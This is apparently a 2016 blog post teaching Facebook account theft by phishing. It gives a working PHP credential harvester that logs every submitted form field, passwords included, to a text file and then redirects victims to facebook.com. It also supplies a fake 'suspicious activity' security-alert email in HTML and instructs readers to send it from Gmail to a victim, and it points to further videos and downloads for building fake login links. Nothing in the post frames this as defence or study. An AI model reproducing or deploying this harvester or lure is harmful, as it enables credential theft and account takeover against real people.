Friday, 11 November 2016

facebook hacking (with phishing 2016)

                                              Pishing Code For Facebook Hacking

   


watch above video to know how to hack facebook with phishing



  <?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Thank you!

                                                                                                                                                                   
                                     
                                                 How to send html email in gmail



1] OPEN ANY NOTEPAD(I WILL SUGGEST YOU TO USE NOTEPAD++)

2] AND TYPE YOUR HTML CODE
EG.


<!Doctype html>
<html>
<head>
<title>MyWeb</title>
</head>
<body>
<p>
hi,xyz

we found suspecios activity in your account
login from unknown device
from
device:xyz
ip    :xxx.xx.xx.x
location:xyz

if it wasn't you please click <a href="">here</a> to change the password
 Thankyou!

</p>
</body>
</html>

now save this(AS PRO.HTML ) and open in any webbrowser

copy all and paste in  gmail and send to victim

if u dont know how to make fake facebook password link WATCH MY NEXT VIDEO ON YOUTUBE

:)

                                                                                                                                                                   

                                      Download the facebook hack with gmail varification

you can download files here


No comments:

Post a Comment